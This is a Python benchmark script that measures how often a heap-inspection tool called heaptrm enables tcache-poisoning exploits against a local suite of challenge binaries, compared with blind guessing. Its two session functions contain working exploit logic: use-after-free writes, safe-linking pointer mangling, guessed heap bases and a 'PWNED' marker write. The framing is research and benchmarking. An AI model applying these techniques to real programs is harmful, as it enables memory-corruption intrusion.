File size: 8,037 Bytes
e1fab24
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
#!/usr/bin/env python3
"""
same_session_benchmark.py — The correct benchmark.

Both approaches run in the SAME process session:
  A: heaptrm session — observe addresses, compute exploit, execute in same session
  B: blind session — same binary, same protocol, but no heap observation

This tests: does structured heap observation enable exploitation that's
otherwise impossible? No LLM needed — the exploit logic is deterministic
given the addresses. The question is purely: can we GET the addresses?
"""

import subprocess
import json
import struct
import os
from pathlib import Path
from collections import defaultdict

# Directory two levels above this script; the other paths are built from it.
ROOT = Path(__file__).parent.parent
# Directory holding manifest.json and the challenge binaries.
SUITE = ROOT.joinpath("cve_tests", "suite")
# Path of the heaptrm executable (release build), kept as a plain string
# because it is used as the first element of a subprocess argument list.
HEAPTRM = str(ROOT.joinpath("heaptrm-cli", "target", "release", "heaptrm"))
# Number of times each challenge is attempted with each approach.
TRIALS = 10


def heaptrm_session(binary: str, sc: int) -> bool:
    """Run one heaptrm-driven exploit attempt against ``binary``.

    A single heaptrm process is started for the target and driven over a
    line-oriented JSON protocol on stdin/stdout: each request is
    ``{"action": ..., "data": ...}`` on one line, and one line of JSON is
    read back as the reply. The session allocates three chunks, frees two,
    asks heaptrm to ``observe`` the heap, derives a poisoned forward pointer
    from the reported chunk addresses and performs the overwrite in that
    same process.

    Args:
        binary: Path of the challenge binary handed to heaptrm.
        sc: Third field of the target's ``1 <slot> <sc>`` allocation command
            (presumably a size or size class - confirm against the
            challenge sources).

    Returns:
        True if the final read of slot 2 contains the marker hex
        ``50574e4544``. False if no heap was reported, fewer than two freed
        chunks or no allocated chunk were reported, or any error occurred
        while talking to heaptrm.
    """
    proc = subprocess.Popen(
        [HEAPTRM, binary],
        stdin=subprocess.PIPE,
        stdout=subprocess.PIPE,
        stderr=subprocess.DEVNULL,
        text=True,
    )

    def cmd(action, data=""):
        """Send one JSON request and return the decoded one-line reply."""
        proc.stdin.write(json.dumps({"action": action, "data": data}) + "\n")
        proc.stdin.flush()
        line = proc.stdout.readline()
        # A blank line (including EOF) is treated as an empty reply.
        return json.loads(line) if line.strip() else {}

    def by_address(chunk):
        """Sort key: the chunk's hex address string as an integer."""
        return int(chunk["address"], 16)

    try:
        # Setup: alloc 3, free 2
        for slot in range(3):
            cmd("send", f"1 {slot} {sc}\n")
        cmd("send", "4 0\n")
        cmd("send", "4 1\n")

        # OBSERVE - this is what heaptrm provides
        reply = cmd("observe")
        if not reply.get("heap"):
            cmd("quit")
            return False

        chunks = reply["heap"]["chunks"]
        freed = sorted((c for c in chunks if c["state"] == "freed"),
                       key=by_address)
        allocated = sorted((c for c in chunks if c["state"] == "allocated"),
                           key=by_address)

        if len(freed) < 2 or not allocated:
            cmd("quit")
            return False

        # COMPUTE - deterministic given addresses.
        # The highest-address freed chunk is taken to be slot 1 and the
        # highest-address allocated chunk is the overwrite target. The stored
        # pointer is the target XORed with the freed chunk's address >> 12.
        chunk1_addr = by_address(freed[-1])
        target_addr = by_address(allocated[-1])
        poisoned = target_addr ^ (chunk1_addr >> 12)
        # Little-endian 8-byte value, hex-encoded (always 16 hex digits).
        fd_hex = struct.pack("<Q", poisoned).hex()

        # EXPLOIT - in same session
        cmd("send", f"2 1 {fd_hex}\n")      # write poisoned pointer via slot 1
        cmd("send", f"1 3 {sc}\n")
        cmd("send", f"1 4 {sc}\n")          # intended to land on the target
        cmd("send", "2 4 50574e454421210a\n")  # marker bytes: b"PWNED!!\n"
        reply = cmd("send", "3 2\n")        # read slot 2 back
        cmd("quit")

        return "50574e4544" in reply.get("output", "")

    except Exception:
        # Deliberate best-effort: a broken pipe, malformed reply or missing
        # key simply counts as a failed trial.
        return False
    finally:
        # Always tear the child down, whatever path was taken above.
        try:
            proc.kill()
            proc.wait(timeout=2)
        except (OSError, subprocess.TimeoutExpired):
            pass
        # Close our pipe ends explicitly instead of waiting for garbage
        # collection; flushing to a dead child may raise, which is harmless.
        for stream in (proc.stdin, proc.stdout):
            try:
                stream.close()
            except OSError:
                pass


def blind_session(binary: str, sc: int, config: dict) -> bool:
    """Run one exploit attempt using only what the target itself prints.

    The target is started directly (via pwntools) and driven with the same
    text commands as the heaptrm session, but without any heap observation.
    The poisoned pointer is derived from, in order of preference:

    1. addresses printed in the replies to the allocation commands,
    2. a value read back from freed slot 1, decoded with a guessed key,
    3. the first allocation's address plus guessed chunk spacing,
    4. a single fixed guess when nothing usable was printed.

    Only one attempt is made per session: a wrong pointer cannot be retried
    in the same process.

    Args:
        binary: Path of the challenge binary to run.
        sc: Third field of the target's ``1 <slot> <sc>`` allocation command
            (presumably a size or size class - confirm against the
            challenge sources).
        config: Manifest entry for the challenge. Not used by this function;
            accepted so callers can pass it.

    Returns:
        True if the final read of slot 2 contains the marker hex
        ``50574e4544``; False otherwise, including on any error while
        talking to the process.
    """
    from pwn import process as pwn_process, p64, context
    context.log_level = "error"

    p = pwn_process(binary)

    def do(cmd):
        """Send one command line and return the next reply line, stripped."""
        p.sendline(cmd.encode())
        return p.recvline(timeout=1).strip()

    try:
        # Setup: alloc 3, free 2 (same sequence as the heaptrm session).
        replies = [do(f"1 {slot} {sc}") for slot in range(3)]
        do("4 0")
        do("4 1")

        # Check for address leaks in alloc output: take the token that
        # follows the first "0x" in each reply, if there is one.
        addrs = [None, None, None]
        for slot, reply in enumerate(replies):
            if reply and b"0x" in reply:
                try:
                    addrs[slot] = int(reply.split(b"0x")[1].split()[0], 16)
                except (ValueError, IndexError):
                    pass
        addr0, addr1, addr2 = addrs

        # Try UAF read: read freed slot 1 and parse its first 16 characters
        # as a hex number.
        leaked_fd = None
        leak = do("3 1")
        if leak and leak not in (b"DELETED", b"ERR") and len(leak) >= 16:
            try:
                leaked_fd = int(leak[:16], 16)
            except ValueError:
                pass

        # Compute based on available info
        poisoned = None
        if addr1 and addr2:
            poisoned = addr2 ^ (addr1 >> 12)
        elif leaked_fd and not addr1:
            # Decrypt fd with guessed key (equal to 0x555555559000 >> 12,
            # the heap base assumed by the blind guess below).
            key = 0x555555559
            decrypted = leaked_fd ^ key
            if 0x555555550000 < decrypted < 0x555555570000:
                target = decrypted + 0xa0
                poisoned = target ^ key
        elif addr0 and not addr1 and not addr2:
            # Only first address - guess offsets (0x50 between chunks).
            addr1_guess = addr0 + 0x50
            addr2_guess = addr0 + 0xa0
            poisoned = addr2_guess ^ (addr1_guess >> 12)

        if poisoned is None:
            # Pure blind: one guess from an assumed base and first-chunk
            # offset. A wrong guess cannot be retried in this session
            # (tcache corrupted), so no further offsets are attempted.
            c1 = 0x555555559000 + 0x2a0 + 0x50
            tgt = c1 + 0x50
            poisoned = tgt ^ (c1 >> 12)

        # EXPLOIT - same command sequence as the heaptrm session.
        do(f"2 1 {p64(poisoned).hex()}")   # write poisoned pointer via slot 1
        do(f"1 3 {sc}")
        do(f"1 4 {sc}")                    # intended to land on the target
        do("2 4 50574e454421210a")         # marker bytes: b"PWNED!!\n"
        result = do("3 2")                 # read slot 2 back
        return b"50574e4544" in result

    except Exception:
        # Best-effort: EOF, packing errors etc. count as a failed trial.
        # KeyboardInterrupt/SystemExit are deliberately not caught.
        return False
    finally:
        # Always release the child process, whichever path was taken.
        try:
            p.close()
        except Exception:
            pass


def main():
    """Run the whole suite with both approaches and report the results.

    Reads ``manifest.json`` from ``SUITE``. For every manifest entry whose
    binary exists, runs ``TRIALS`` rounds of ``heaptrm_session`` followed by
    ``blind_session``. Prints one line per challenge, a per-difficulty
    table and an overall row, then writes the per-challenge results to
    ``bench/same_session_results.json`` relative to the current working
    directory.

    Each manifest entry is expected to provide the keys ``name``,
    ``difficulty``, ``uaf_read``, ``addr_leak``, ``noise_min`` and
    ``noise_max``; a missing key raises ``KeyError``.
    """
    manifest = json.loads((SUITE / "manifest.json").read_text())

    print("=" * 80)
    print("SAME-SESSION BENCHMARK: heaptrm vs blind (same process)")
    print(f"{len(manifest)} challenges × {TRIALS} trials")
    print("=" * 80)

    # Per-difficulty success counters: heaptrm wins, blind wins, trials run.
    by_diff = defaultdict(lambda: {"ht": 0, "bl": 0, "n": 0})
    all_results = []

    for config in manifest:
        name = config["name"]
        binary = str(SUITE / name)
        if not Path(binary).exists():
            # Challenges whose binary is not present are silently skipped.
            continue

        sc = 1
        ht = bl = 0
        for _ in range(TRIALS):
            if heaptrm_session(binary, sc):
                ht += 1
            if blind_session(binary, sc, config):
                bl += 1

        diff = config["difficulty"]
        bucket = by_diff[diff]
        bucket["ht"] += ht
        bucket["bl"] += bl
        bucket["n"] += TRIALS

        # Marker summarises who won: ">>>" heaptrm ahead by more than half
        # the trials, ">" ahead, "==" tie, "<" blind ahead.
        delta = ht - bl
        if delta > TRIALS // 2:
            marker = ">>>"
        elif delta > 0:
            marker = ">"
        elif delta == 0:
            marker = "=="
        else:
            marker = "<"
        info = f"leak={config['addr_leak']:7s} uaf={str(config['uaf_read']):5s} noise={config['noise_min']}-{config['noise_max']}"
        print(f"  {name} [{diff:8s}] ht={ht:2d}/{TRIALS} bl={bl:2d}/{TRIALS} {marker:3s} | {info}")

        all_results.append({
            "name": name, "difficulty": diff,
            "heaptrm": ht, "blind": bl, "trials": TRIALS,
            **{k: config[k] for k in ["uaf_read", "addr_leak", "noise_min", "noise_max"]}
        })

    print("\n" + "=" * 80)
    print(f"{'Difficulty':10s} {'heaptrm':>10s} {'blind':>10s} {'delta':>8s}")
    for diff in ["easy", "medium", "hard", "extreme"]:
        # .get avoids inserting empty buckets for difficulties never seen.
        d = by_diff.get(diff)
        if d is None or d["n"] == 0:
            continue
        ht_pct = d["ht"] / d["n"] * 100
        bl_pct = d["bl"] / d["n"] * 100
        print(f"{diff:10s} {ht_pct:9.0f}% {bl_pct:9.0f}% {ht_pct-bl_pct:+7.0f}%")

    total_ht = sum(d["ht"] for d in by_diff.values())
    total_bl = sum(d["bl"] for d in by_diff.values())
    total_n = sum(d["n"] for d in by_diff.values())
    if total_n:
        print(f"{'OVERALL':10s} {total_ht/total_n*100:9.0f}% {total_bl/total_n*100:9.0f}% {(total_ht-total_bl)/total_n*100:+7.0f}%")
    else:
        # No trial ran (empty manifest or no binaries present): avoid
        # dividing by zero and still write the (empty) results file below.
        print(f"{'OVERALL':10s} {'n/a':>10s} {'n/a':>10s} {'n/a':>8s}")

    Path("bench").mkdir(exist_ok=True)
    with open("bench/same_session_results.json", "w") as f:
        json.dump(all_results, f, indent=2)


# Run the benchmark only when this file is executed as a script, not on import.
if __name__ == "__main__":
    main()